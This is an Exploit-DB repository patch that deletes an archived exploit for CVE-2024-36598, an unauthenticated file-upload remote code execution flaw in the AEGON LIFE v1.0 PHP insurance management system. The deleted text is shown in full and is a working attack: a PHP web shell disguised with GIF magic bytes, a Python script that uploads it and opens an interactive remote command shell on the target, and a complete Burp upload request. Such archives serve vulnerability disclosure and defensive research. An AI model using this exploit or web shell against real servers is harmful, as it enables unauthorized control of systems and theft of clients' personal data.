From 731ce583a5022b84f6b4527019ad9599ad779d7c Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 26 Nov 2024 00:16:28 +0000
Subject: [PATCH] DB: 2024-11-26

3 changes to exploits/shellcodes/ghdb

AEGON LIFE v1.0 Life Insurance Management System - Unauthenticated Remote Code Execution (RCE)
---
 exploits/php/webapps/52045.txt | 224 ---------------------------------
 files_exploits.csv             |   1 -
 2 files changed, 225 deletions(-)
 delete mode 100644 exploits/php/webapps/52045.txt

diff --git a/exploits/php/webapps/52045.txt b/exploits/php/webapps/52045.txt
deleted file mode 100644
index 742b10ea11..0000000000
--- a/exploits/php/webapps/52045.txt
+++ /dev/null
@@ -1,224 +0,0 @@
-# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)
-# Exploit Author: Aslam Anwar Mahimkar
-# Date: 18-05-2024
-# Category: Web application
-# Vendor Homepage: https://projectworlds.in/
-# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/
-# Version: AEGON LIFE v1.0
-# Tested on: Linux
-# CVE: CVE-2024-36598
-
-# Description:
-----------------
-
--An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.
-
--In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.
-
-
-# Payload:
-------------------
-
-payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"
-
-
-# RCE via executing exploit:
----------------------------------------
-
-    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/
-    # will lead to RCE shell.
-
-POC
--------------------
-
-import argparse
-import random
-import requests
-import string
-import sys
-
-parser = argparse.ArgumentParser()
-parser.add_argument('url', action='store', help='The URL of the target.')
-args = parser.parse_args()
-
-url = args.url.rstrip('/')
-random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
-
-payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"
-
-file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}
-print('> Attempting to upload PHP web shell...')
-r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)
-print('> Verifying shell upload...')
-r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
-
-if random_file in r.text:
-    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')
-    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')
-    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
-    if launch_shell.lower() == 'y':
-        while True:
-            cmd = str(input('RCE $ '))
-            if cmd == 'exit':
-                sys.exit(0)
-            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)
-            print(r.text)
-else:
-    if r.status_code == 200:
-        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
-    else:
-        print('> Web shell failed to upload! The web server may not have write permissions.')
-
----------------------------------------------------------------------------------------------------------------------------
-
-### Can also performed manually.
-
-
-Payload:
---------------
-
-GIF89a;
-<?php
-echo"<pre>";
-passthru($_GET['cmd']);
-echo"<pre>";
-?>
-
-# Attack Vectors:
--------------------------
-
-After uploading malicious image can access it to get the shell
-
-http://localhost/lims/uploads/shell2.gif.php?cmd=id
-
-
-Burp Suit Request
------------------------------
-
-POST /lims/insertClient.php HTTP/1.1
-Host: localhost
-Content-Length: 2197
-Cache-Control: max-age=0
-sec-ch-ua:
-sec-ch-ua-mobile: ?0
-sec-ch-ua-platform: ""
-Upgrade-Insecure-Requests: 1
-Origin: http://localhost
-Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Sec-Fetch-Site: same-origin
-Sec-Fetch-Mode: navigate
-Sec-Fetch-User: ?1
-Sec-Fetch-Dest: document
-Referer: http://localhost/lims/addClient.php
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="client_id"
-
-1716015032
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="client_password"
-
-Password
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="name"
-
-Test
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"
-Content-Type: application/x-php
-
-GIF89a;
-<?php
-echo"<pre>";
-passthru($_GET['cmd']);
-echo"<pre>";
-?>
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="sex"
-
-Male
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="birth_date"
-
-1/1/1988
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="maritial_status"
-
-M
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nid"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="phone"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="address"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="policy_id"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="agent_id"
-
-Agent007
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nominee_id"
-
-1716015032-275794639
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nominee_name"
-
-Test1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nominee_sex"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nominee_birth_date"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nominee_nid"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nominee_relationship"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="priority"
-
-1
-
-------WebKitFormBoundary5plGALZGPOOdBlF0
-Content-Disposition: form-data; name="nominee_phone"
-
-1
-------WebKitFormBoundary5plGALZGPOOdBlF0
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8686d7ec5a..a247366a53 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -13713,7 +13713,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 2377,exploits/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,webapps,php,,2006-09-15,,1,OSVDB-28924;CVE-2006-4870;OSVDB-28923,,,,,
 52046,exploits/php/webapps/52046.txt,"AEGON LIFE v1.0 Life Insurance Management System - SQL injection vulnerability.",2024-06-14,"Aslam Anwar Mahimkar",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 52042,exploits/php/webapps/52042.txt,"AEGON LIFE v1.0 Life Insurance Management System - Stored cross-site scripting (XSS)",2024-06-14,"Aslam Anwar Mahimkar",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
-52045,exploits/php/webapps/52045.txt,"AEGON LIFE v1.0 Life Insurance Management System - Unauthenticated Remote Code Execution (RCE)",2024-06-14,"Aslam Anwar Mahimkar",webapps,php,,2024-06-14,2024-06-14,0,,,,,,
 1896,exploits/php/webapps/1896.txt,"aePartner 0.8.3 - 'dir[data]' Remote File Inclusion",2006-06-10,Kacper,webapps,php,,2006-06-09,2016-08-16,1,OSVDB-26332;CVE-2006-2996,,,,http://www.exploit-db.comaePartner-0.8.3.tar.gz,
 51085,exploits/php/webapps/51085.txt,"Aero CMS v0.0.1 - PHP Code Injection (auth)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
 51083,exploits/php/webapps/51083.txt,"Aero CMS v0.0.1 - SQL Injection (no auth)",2023-03-27,"Hubert Wojciechowski",webapps,php,,2023-03-27,2023-03-27,0,,,,,,